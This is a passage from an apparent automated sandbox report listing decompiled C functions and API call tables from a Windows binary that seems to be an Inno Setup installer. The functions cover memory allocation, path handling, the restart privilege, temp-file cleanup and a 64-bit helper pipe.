                                                            					_t35 = _t14;
                                                            					_t15 =  *0x6d4ff4; // 0x0
                                                            					 *_t35 = _t15;
                                                            					_t1 = _t35 + 4; // 0x4
                                                            					E0040714C(0x6c7a94, _t24, 2, _t1);
                                                            					_t2 = _t35 + 5; // 0x5
                                                            					 *((intOrPtr*)(_t35 + 6)) = E00478454(_t2, 0x478434);
                                                            					_t4 = _t35 + 0xa; // 0xa
                                                            					_t26 = _t4;
                                                            					do {
                                                            						 *_t26 = 0xe8;
                                                            						_t5 = _t35 + 4; // 0x4
                                                            						 *((intOrPtr*)(_t26 + 1)) = E00478454(_t26, _t5);
                                                            						 *((intOrPtr*)(_t26 + 5)) =  *0x6d4ff8;
                                                            						 *0x6d4ff8 = _t26;
                                                            						_t26 = _t26 + 0xd;
                                                            					} while (_t26 - _t35 < 0xffc);
                                                            					 *0x6d4ff4 = _t35;
                                                            				}
                                                            				_t25 =  *0x6d4ff8;
                                                            				 *0x6d4ff8 =  *((intOrPtr*)(_t25 + 5));
                                                            				 *((intOrPtr*)(_t25 + 5)) = _a4;
                                                            				 *((intOrPtr*)(_t25 + 9)) = _a8;
                                                            				return  *0x6d4ff8;
                                                            			}











                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D62F8,00000000,00000000,?,00478693,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 0047847A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
                                                            • Instruction ID: 21ed9f25b44590dd6a88678dd2699128a8c8abd14296acda62ee9fdc78064473
                                                            • Opcode Fuzzy Hash: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
                                                            • Instruction Fuzzy Hash: F6114C746813069BC710DF19C880B86B7E5EB98350F10C53AE96C9F385E7B4E904CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004056E8(signed int __eax) {
                                                            				void* _t4;
                                                            				intOrPtr _t7;
                                                            				signed int _t8;
                                                            				void** _t10;
                                                            				void* _t12;
                                                            				void* _t14;
                                                            
                                                            				_t8 = __eax;
                                                            				E0040567C(__eax);
                                                            				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
                                                            				if(_t4 == 0) {
                                                            					 *0x6cfaf4 = 0;
                                                            					return 0;
                                                            				} else {
                                                            					_t10 =  *0x6cfae0; // 0x6cfadc
                                                            					_t14 = _t4;
                                                            					 *_t14 = 0x6cfadc;
                                                            					 *0x6cfae0 = _t4;
                                                            					 *(_t14 + 4) = _t10;
                                                            					 *_t10 = _t4;
                                                            					_t12 = _t14 + 0x13fff0;
                                                            					 *((intOrPtr*)(_t12 - 4)) = 2;
                                                            					 *0x6cfaf4 = 0x13ffe0 - _t8;
                                                            					_t7 = _t12 - _t8;
                                                            					 *0x6cfaf0 = _t7;
                                                            					 *(_t7 - 4) = _t8 | 0x00000002;
                                                            					return _t7;
                                                            				}
                                                            			}










                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                            • Instruction ID: 671f966e8e8ef53a1d331dc007cdee3d18c8d913abcb1f2bfacacf6af6d793b4
                                                            • Opcode Fuzzy Hash: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                            • Instruction Fuzzy Hash: 9CF0AFF2B003018FD7549FB89D40B12BBD6E708354F20413EE90DEB794D7B088008B88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            C-Code - Quality: 78%
                                                            			E0040E0D4(short* __eax, intOrPtr __edx) {
                                                            				short* _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				void* _v20;
                                                            				struct _WIN32_FIND_DATAW _v612;
                                                            				short _v1134;
                                                            				signed int _t50;
                                                            				signed int _t51;
                                                            				void* _t55;
                                                            				signed int _t88;
                                                            				signed int _t89;
                                                            				intOrPtr* _t90;
                                                            				signed int _t101;
                                                            				signed int _t102;
                                                            				short* _t112;
                                                            				struct HINSTANCE__* _t113;
                                                            				short* _t115;
                                                            				short* _t116;
                                                            				void* _t117;
                                                            
                                                            				_v12 = __edx;
                                                            				_v8 = __eax;
                                                            				_v16 = _v8;
                                                            				_t113 = GetModuleHandleW(L"kernel32.dll");
                                                            				if(_t113 == 0) {
                                                            					L4:
                                                            					if( *_v8 != 0x5c) {
                                                            						_t115 = _v8 + 4;
                                                            						goto L10;
                                                            					} else {
                                                            						if( *((short*)(_v8 + 2)) == 0x5c) {
                                                            							_t116 = E0040E0B0(_v8 + 4);
                                                            							if( *_t116 != 0) {
                                                            								_t14 = _t116 + 2; // 0x2
                                                            								_t115 = E0040E0B0(_t14);
                                                            								if( *_t115 != 0) {
                                                            									L10:
                                                            									_t88 = _t115 - _v8;
                                                            									_t89 = _t88 >> 1;
                                                            									if(_t88 < 0) {
                                                            										asm("adc ebx, 0x0");
                                                            									}
                                                            									_t43 = _t89 + 1;
                                                            									if(_t89 + 1 <= 0x105) {
                                                            										E0040DAF8( &_v1134, _v8, _t43);
                                                            										while( *_t115 != 0) {
                                                            											_t112 = E0040E0B0(_t115 + 2);
                                                            											_t50 = _t112 - _t115;
                                                            											_t51 = _t50 >> 1;
                                                            											if(_t50 < 0) {
                                                            												asm("adc eax, 0x0");
                                                            											}
                                                            											if(_t51 + _t89 + 1 <= 0x105) {
                                                            												_t55 =  &_v1134 + _t89 + _t89;
                                                            												_t101 = _t112 - _t115;
                                                            												_t102 = _t101 >> 1;
                                                            												if(_t101 < 0) {
                                                            													asm("adc edx, 0x0");
                                                            												}
                                                            												E0040DAF8(_t55, _t115, _t102 + 1);
                                                            												_v20 = FindFirstFileW( &_v1134,  &_v612);
                                                            												if(_v20 != 0xffffffff) {
                                                            													FindClose(_v20);
                                                            													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
                                                            														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
                                                            														E0040DAF8( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
                                                            														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
                                                            														_t115 = _t112;
                                                            														continue;
                                                            													}
                                                            												}
                                                            											}
                                                            											goto L24;
                                                            										}
                                                            										E0040DAF8(_v8,  &_v1134, _v12);
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
                                                            					if(_t90 == 0) {
                                                            						goto L4;
                                                            					} else {
                                                            						_push(0x105);
                                                            						_push( &_v1134);
                                                            						_push(_v8);
                                                            						if( *_t90() == 0) {
                                                            							goto L4;
                                                            						} else {
                                                            							E0040DAF8(_v8,  &_v1134, _v12);
                                                            						}
                                                            					}
                                                            				}
                                                            				L24:
                                                            				return _v16;
                                                            			}























                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,0041CF90,?,?), ref: 0040E0F1
                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
                                                            • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF90,?,?), ref: 0040E202
                                                            • FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E214
                                                            • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E220
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E265
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                            • API String ID: 1930782624-3908791685
                                                            • Opcode ID: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                            • Instruction ID: 85f15f90104044dde56611b048d4fe37091be9da2e2d426f5e1dee482ffdf80d
                                                            • Opcode Fuzzy Hash: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                            • Instruction Fuzzy Hash: 09418471E005189BCB10DAA6CC85ADEB3B9EF44310F1449FAD504F72C1EB789E568F89
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0060F6D8() {
                                                            				int _v4;
                                                            				struct _TOKEN_PRIVILEGES _v16;
                                                            				void* _v20;
                                                            				int _t7;
                                                            
                                                            				if(E00429D18() != 2) {
                                                            					L5:
                                                            					_t7 = ExitWindowsEx(2, 0);
                                                            					asm("sbb eax, eax");
                                                            					return _t7 + 1;
                                                            				}
                                                            				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
                                                            					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
                                                            					_v16.PrivilegeCount = 1;
                                                            					_v4 = 2;
                                                            					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
                                                            					if(GetLastError() == 0) {
                                                            						goto L5;
                                                            					}
                                                            					return 0;
                                                            				}
                                                            				return 0;
                                                            			}








                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0060F707
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F72E
                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F733
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0060F744
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 107509674-3733053543
                                                            • Opcode ID: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
                                                            • Instruction ID: 06ed2f01938c74524bf5f5b14376f39d724559be6214a1270456cb597724f4e2
                                                            • Opcode Fuzzy Hash: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
                                                            • Instruction Fuzzy Hash: 8EF090306E430276E624AF719C47FEB218D9B40B09F50092DF644D61C1DBA9E589826B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 74%
                                                            			E006A68B0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, short* _a8, intOrPtr _a12, void* _a16, char _a20, intOrPtr _a24, intOrPtr* _a32, intOrPtr _a36, intOrPtr* _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
                                                            				char _v5;
                                                            				intOrPtr _v12;
                                                            				struct HWND__* _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v84;
                                                            				intOrPtr _v88;
                                                            				intOrPtr _v92;
                                                            				intOrPtr _v96;
                                                            				intOrPtr _v100;
                                                            				intOrPtr _v104;
                                                            				signed int _v108;
                                                            				intOrPtr _v112;
                                                            				intOrPtr _v116;
                                                            				char _v120;
                                                            				intOrPtr* _t70;
                                                            				intOrPtr* _t74;
                                                            				signed int _t77;
                                                            				signed int _t78;
                                                            				intOrPtr* _t79;
                                                            				signed int _t82;
                                                            				signed int _t83;
                                                            				short* _t87;
                                                            				intOrPtr _t106;
                                                            				intOrPtr _t123;
                                                            				void* _t125;
                                                            				char _t126;
                                                            				intOrPtr* _t127;
                                                            				intOrPtr _t136;
                                                            				intOrPtr _t140;
                                                            				intOrPtr _t145;
                                                            				intOrPtr _t147;
                                                            				intOrPtr* _t148;
                                                            				void* _t150;
                                                            				void* _t151;
                                                            				intOrPtr _t152;
                                                            				intOrPtr _t164;
                                                            
                                                            				_t150 = _t151;
                                                            				_t152 = _t151 + 0xffffff8c;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				_t147 = __ecx;
                                                            				_t123 = __edx;
                                                            				_t145 = __eax;
                                                            				_push(_t150);
                                                            				_push(0x6a6acd);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t152;
                                                            				if( *0x6d648c == 0) {
                                                            					_v5 = 0;
                                                            					__eflags = 0;
                                                            					_pop(_t136);
                                                            					 *[fs:eax] = _t136;
                                                            					_push(E006A6AD4);
                                                            					return 0;
                                                            				} else {
                                                            					E00407760( &_v120, 0x60);
                                                            					_v120 = 0x60;
                                                            					if(_a20 != 0) {
                                                            						_v108 = _v108 | 0x00002000;
                                                            					}
                                                            					_v112 =  *0x6d2634;
                                                            					_t70 =  *0x6cdec4; // 0x6d579c
                                                            					if(IsIconic( *( *_t70 + 0x188)) == 0) {
                                                            						_t74 =  *0x6cdec4; // 0x6d579c
                                                            						_t77 = GetWindowLongW( *( *_t74 + 0x188), 0xfffffff0);
                                                            						__eflags = _t77 & 0x10000000;
                                                            						_t12 = (_t77 & 0x10000000) == 0;
                                                            						__eflags = _t12;
                                                            						_t78 = _t77 & 0xffffff00 | _t12;
                                                            					} else {
                                                            						_t78 = 1;
                                                            					}
                                                            					if(_t78 == 0) {
                                                            						_t79 =  *0x6cdec4; // 0x6d579c
                                                            						_t82 = GetWindowLongW( *( *_t79 + 0x188), 0xffffffec);
                                                            						__eflags = _t82 & 0x00000080;
                                                            						_t17 = (_t82 & 0x00000080) != 0;
                                                            						__eflags = _t17;
                                                            						_t83 = _t82 & 0xffffff00 | _t17;
                                                            					} else {
                                                            						_t83 = 1;
                                                            					}
                                                            					if(_t83 == 0) {
                                                            						_v116 = _t145;
                                                            					} else {
                                                            						_v116 = 0;
                                                            					}
                                                            					_v104 = _a44;
                                                            					_v100 = _a52;
                                                            					_v96 = _a48;
                                                            					_v92 = _t123;
                                                            					_v88 = _t147;
                                                            					_t87 = _a8;
                                                            					if(_t87 != 0 &&  *_t87 != 0) {
                                                            						_v60 = _a8;
                                                            					}
                                                            					if(_a24 != 0) {
                                                            						_v36 = 0x6a6888;
                                                            						_v32 = _a24;
                                                            					}
                                                            					_v12 = 0;
                                                            					_push(_t150);
                                                            					_push(0x6a6ab4);
                                                            					_push( *[fs:edx]);
                                                            					 *[fs:edx] = _t152;
                                                            					_t125 = _a36 + 1;
                                                            					if(_t125 != 0) {
                                                            						_t106 =  *0x54808c; // 0x5480e4
                                                            						_v12 = E00466A64(0, 1, _t145, _t106);
                                                            						_v108 = _v108 | 0x00000010;
                                                            						_t125 = _t125 - 1;
                                                            						if(_t125 >= 0) {
                                                            							_t126 = _t125 + 1;
                                                            							_t164 = _t126;
                                                            							_v24 = _t126;
                                                            							_t127 = _a40;
                                                            							_t148 = _a32;
                                                            							do {
                                                            								_t145 = E0054BA48(_v12);
                                                            								E0054B708(_t145,  *_t127, _t164);
                                                            								 *((intOrPtr*)(_t145 + 0x18)) =  *_t148;
                                                            								_t148 = _t148 + 4;
                                                            								_t127 = _t127 + 4;
                                                            								_t45 =  &_v24;
                                                            								 *_t45 = _v24 - 1;
                                                            							} while ( *_t45 != 0);
                                                            						}
                                                            						_v80 = E0054BA54(_v12);
                                                            						_v84 =  *((intOrPtr*)( *((intOrPtr*)(_v12 + 8)) + 8));
                                                            					}
                                                            					E005C9060();
                                                            					_v16 = GetActiveWindow();
                                                            					_v20 = E005ABB4C(0, _t125, _t145, _t147);
                                                            					 *[fs:eax] = _t152;
                                                            					_v5 =  *0x6d648c( &_v120, _a12, 0, _a4,  *[fs:eax], 0x6a6a97, _t150) == 0;
                                                            					_pop(_t140);
                                                            					 *[fs:eax] = _t140;
                                                            					_push(E006A6A9E);
                                                            					E005ABC0C(_v20);
                                                            					SetActiveWindow(_v16);
                                                            					return E005C9060();
                                                            				}
                                                            			}













































                                                            APIs
                                                            • IsIconic.USER32(?), ref: 006A6913
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006A6930
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006A6955
                                                              • Part of subcall function 005ABC0C: IsWindow.USER32(8B565300), ref: 005ABC1A
                                                              • Part of subcall function 005ABC0C: EnableWindow.USER32(8B565300,000000FF), ref: 005ABC29
                                                            • GetActiveWindow.USER32 ref: 006A6A34
                                                            • SetActiveWindow.USER32(00000005,006A6A9E,006A6AB4,?,?,000000EC,?,000000F0,00000000,006A6ACD,?,00000000,?,00000000), ref: 006A6A87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$ActiveLong$EnableIconic
                                                            • String ID: `
                                                            • API String ID: 4222481217-2679148245
                                                            • Opcode ID: cde2a6536f5044e3bc4238d2ffbe734793dbf8fec1bfd9d9ee3b4b44e3c8bba9
                                                            • Instruction ID: 936cf99dd23b6ce25ef8ab77046748165037aff960be166beb91cb3f54ae6a19
                                                            • Opcode Fuzzy Hash: cde2a6536f5044e3bc4238d2ffbe734793dbf8fec1bfd9d9ee3b4b44e3c8bba9
                                                            • Instruction Fuzzy Hash: C3611875A002099FDB00EFA9C885A9EBBF6FB4A304F598469F914EB361D734AD41CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E006B8DE4(void* __eax, void* __ebx, void* __esi, void* __eflags) {
                                                            				char _v8;
                                                            				void* _v12;
                                                            				struct _WIN32_FIND_DATAW _v604;
                                                            				char _v608;
                                                            				char _v612;
                                                            				void* _t59;
                                                            				intOrPtr _t70;
                                                            				intOrPtr _t73;
                                                            				signed int _t77;
                                                            				void* _t80;
                                                            				void* _t81;
                                                            				intOrPtr _t82;
                                                            
                                                            				_t80 = _t81;
                                                            				_t82 = _t81 + 0xfffffda0;
                                                            				_v612 = 0;
                                                            				_v608 = 0;
                                                            				_v8 = 0;
                                                            				_t59 = __eax;
                                                            				_push(_t80);
                                                            				_push(0x6b8f21);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t82;
                                                            				E0040B4C8( &_v608, L"isRS-???.tmp", __eax);
                                                            				_v12 = FindFirstFileW(E0040B278(_v608),  &_v604);
                                                            				if(_v12 == 0xffffffff) {
                                                            					_pop(_t70);
                                                            					 *[fs:eax] = _t70;
                                                            					_push(E006B8F28);
                                                            					E0040A228( &_v612, 2);
                                                            					return E0040A1C8( &_v8);
                                                            				} else {
                                                            					_push(_t80);
                                                            					_push(0x6b8ef4);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t82;
                                                            					do {
                                                            						if(E004241A0( &(_v604.cFileName), 5, L"isRS-") == 0 && (_v604.dwFileAttributes & 0x00000010) == 0) {
                                                            							E0040B318( &_v612, 0x104,  &(_v604.cFileName));
                                                            							E0040B4C8( &_v8, _v612, _t59);
                                                            							_t77 = _v604.dwFileAttributes;
                                                            							if((_t77 & 0x00000001) != 0) {
                                                            								SetFileAttributesW(E0040B278(_v8), _t77 & 0xfffffffe);
                                                            							}
                                                            							E00423A20(_v8);
                                                            						}
                                                            					} while (FindNextFileW(_v12,  &_v604) != 0);
                                                            					_pop(_t73);
                                                            					 *[fs:eax] = _t73;
                                                            					_push(E006B8EFB);
                                                            					return FindClose(_v12);
                                                            				}
                                                            			}















                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A,?,00000000,00000000,00000000), ref: 006B8E35
                                                            • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B8EB8
                                                            • FindNextFileW.KERNEL32(000000FF,?,00000000,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8ED0
                                                            • FindClose.KERNEL32(000000FF,006B8EFB,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8EEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                            • String ID: isRS-$isRS-???.tmp
                                                            • API String ID: 134685335-3422211394
                                                            • Opcode ID: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
                                                            • Instruction ID: d39c6702953267373b2098697dd7c4daff6c19a754f4e73b98016d5d2bb0ed42
                                                            • Opcode Fuzzy Hash: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
                                                            • Instruction Fuzzy Hash: E6317670A006189FDB10DF65DC45ADEB7BEEB84304F5145FAE804A3291EB389E81CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E005C90B4(WCHAR* __eax, void* __ebx, signed int __ecx, WCHAR* __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				int _v12;
                                                            				struct HWND__* _v16;
                                                            				intOrPtr _v20;
                                                            				intOrPtr* _t28;
                                                            				intOrPtr* _t32;
                                                            				signed int _t36;
                                                            				intOrPtr* _t37;
                                                            				signed int _t41;
                                                            				intOrPtr* _t43;
                                                            				WCHAR* _t62;
                                                            				intOrPtr _t73;
                                                            				intOrPtr _t75;
                                                            				void* _t76;
                                                            				WCHAR* _t78;
                                                            				void* _t80;
                                                            				void* _t81;
                                                            				intOrPtr _t82;
                                                            
                                                            				_t76 = __edi;
                                                            				_t80 = _t81;
                                                            				_t82 = _t81 + 0xfffffff0;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_v8 = __ecx;
                                                            				_t78 = __edx;
                                                            				_t62 = __eax;
                                                            				if( *0x6d5814 != 0) {
                                                            					_v8 = _v8 | 0x00180000;
                                                            				}
                                                            				E005C9060();
                                                            				_push(_t80);
                                                            				_push(0x5c91da);
                                                            				_push( *[fs:edx]);
                                                            				 *[fs:edx] = _t82;
                                                            				_t28 =  *0x6cdec4; // 0x6d579c
                                                            				if(IsIconic( *( *_t28 + 0x188)) == 0) {
                                                            					_t32 =  *0x6cdec4; // 0x6d579c
                                                            					_t36 = GetWindowLongW( *( *_t32 + 0x188), 0xfffffff0) & 0xffffff00 | (_t35 & 0x10000000) == 0x00000000;
                                                            				} else {
                                                            					_t36 = 1;
                                                            				}
                                                            				if(_t36 == 0) {
                                                            					_t37 =  *0x6cdec4; // 0x6d579c
                                                            					_t41 = GetWindowLongW( *( *_t37 + 0x188), 0xffffffec) & 0xffffff00 | (_t40 & 0x00000080) != 0x00000000;
                                                            				} else {
                                                            					_t41 = 1;
                                                            				}
                                                            				if(_t41 == 0) {
                                                            					_t43 =  *0x6cdec4; // 0x6d579c
                                                            					_v12 = L005B8BCC( *_t43, _t62, _t78, _t62, _t76, _t78, _v8);
                                                            					_pop(_t73);
                                                            					 *[fs:eax] = _t73;
                                                            					_push(E005C91E1);
                                                            					return E005C9060();
                                                            				} else {
                                                            					_v16 = GetActiveWindow();
                                                            					_v20 = E005ABB4C(0, _t62, _t76, _t78);
                                                            					_push(_t80);
                                                            					_push(0x5c919d);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t82;
                                                            					_v12 = MessageBoxW(0, _t62, _t78, _v8 | 0x00002000);
                                                            					_pop(_t75);
                                                            					 *[fs:eax] = _t75;
                                                            					_push(E005C91A4);
                                                            					E005ABC0C(_v20);
                                                            					return SetActiveWindow(_v16);
                                                            				}
                                                            			}

                                                            APIs
                                                            • IsIconic.USER32(?), ref: 005C90F9
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005C9116
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 005C913B
                                                            • GetActiveWindow.USER32 ref: 005C9149
                                                            • MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C9176
                                                            • SetActiveWindow.USER32(00000000,005C91A4,?,000000EC,?,000000F0,?,00000000,005C91DA,?,?,00000000), ref: 005C9197
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$ActiveLong$IconicMessage
                                                            • String ID:
                                                            • API String ID: 1633107849-0
                                                            • Opcode ID: 6ccadbc60b25befb027f438fb9d8ea6f9f99e08362a6b6c28a86a9c04d8ecebe
                                                            • Instruction ID: 0eaebbc0e28104152e09dfddf635ce6469108de93c670a6b66e2a7222b47ea08
                                                            • Opcode Fuzzy Hash: 6ccadbc60b25befb027f438fb9d8ea6f9f99e08362a6b6c28a86a9c04d8ecebe
                                                            • Instruction Fuzzy Hash: 4F319375A04605AFDB00EFA9DD4AF9A7BF9FB89350B1544A9F400D73A1DB34AD00DB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E00625754(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                            				char _v12;
                                                            				char _v16;
                                                            				void* _v20;
                                                            				void* _v24;
                                                            				long _v28;
                                                            				struct _STARTUPINFOW _v96;
                                                            				struct _PROCESS_INFORMATION _v112;
                                                            				char _v116;
                                                            				long _v120;
                                                            				char _v124;
                                                            				long _v128;
                                                            				char _v132;
                                                            				intOrPtr _v136;
                                                            				char _v140;
                                                            				intOrPtr _v144;
                                                            				char _v148;
                                                            				char _v152;
                                                            				char _v156;
                                                            				char _v160;
                                                            				char _v164;
                                                            				void* _v168;
                                                            				char _v172;
                                                            				char _v176;
                                                            				char _v180;
                                                            				char _v184;
                                                            				char* _t62;
                                                            				WCHAR* _t91;
                                                            				WCHAR* _t97;
                                                            				intOrPtr _t98;
                                                            				void* _t127;
                                                            				intOrPtr _t139;
                                                            				struct _FILETIME* _t141;
                                                            				void* _t145;
                                                            				void* _t146;
                                                            				intOrPtr _t147;
                                                            
                                                            				_t145 = _t146;
                                                            				_t147 = _t146 + 0xffffff4c;
                                                            				_v156 = 0;
                                                            				_v160 = 0;
                                                            				_v16 = 0;
                                                            				_t127 = __eax;
                                                            				_t141 =  &_v12;
                                                            				_push(_t145);
                                                            				_push(0x625a4f);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t147;
                                                            				E00616130(L"Starting 64-bit helper process.", __eax, _t141, 0x6d636c);
                                                            				_t62 =  *0x6cda20; // 0x6d67dd
                                                            				if( *_t62 == 0) {
                                                            					E0060CD28(L"Cannot utilize 64-bit features on this version of Windows", _t127);
                                                            				}
                                                            				if( *0x6d6368 == 0) {
                                                            					E0060CD28(L"64-bit helper EXE wasn\'t extracted", _t127);
                                                            				}
                                                            				while(1) {
                                                            					 *0x6d636c =  *0x6d636c + 1;
                                                            					 *((intOrPtr*)(_t127 + 0x14)) = GetTickCount();
                                                            					if(QueryPerformanceCounter(_t141) == 0) {
                                                            						GetSystemTimeAsFileTime(_t141);
                                                            					}
                                                            					_v152 = GetCurrentProcessId();
                                                            					_v148 = 0;
                                                            					_v144 =  *0x6d636c;
                                                            					_v140 = 0;
                                                            					_v136 =  *((intOrPtr*)(_t127 + 0x14));
                                                            					_v132 = 0;
                                                            					_v128 = _t141->dwHighDateTime;
                                                            					_v124 = 0;
                                                            					_v120 = _t141->dwLowDateTime;
                                                            					_v116 = 0;
                                                            					E004244F8(L"\\\\.\\pipe\\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x", 4,  &_v152,  &_v16);
                                                            					_v20 = CreateNamedPipeW(E0040B278(_v16), 0x40080003, 6, 1, 0x2000, 0x2000, 0, 0);
                                                            					if(_v20 != 0xffffffff) {
                                                            						break;
                                                            					}
                                                            					if(GetLastError() != 0xe7) {
                                                            						E0060CE84(L"CreateNamedPipe");
                                                            					}
                                                            				}
                                                            				_push(_t145);
                                                            				_push(0x625a0b);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t147;
                                                            				_v24 = CreateFileW(E0040B278(_v16), 0xc0000000, 0, 0x6cd098, 3, 0, 0);
                                                            				if(_v24 == 0xffffffff) {
                                                            					E0060CE84(L"CreateFile");
                                                            				}
                                                            				_push(_t145);
                                                            				_push(0x6259fa);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t147;
                                                            				_v28 = 2;
                                                            				if(SetNamedPipeHandleState(_v24,  &_v28, 0, 0) == 0) {
                                                            					E0060CE84(L"SetNamedPipeHandleState");
                                                            				}
                                                            				E00407760( &_v96, 0x44);
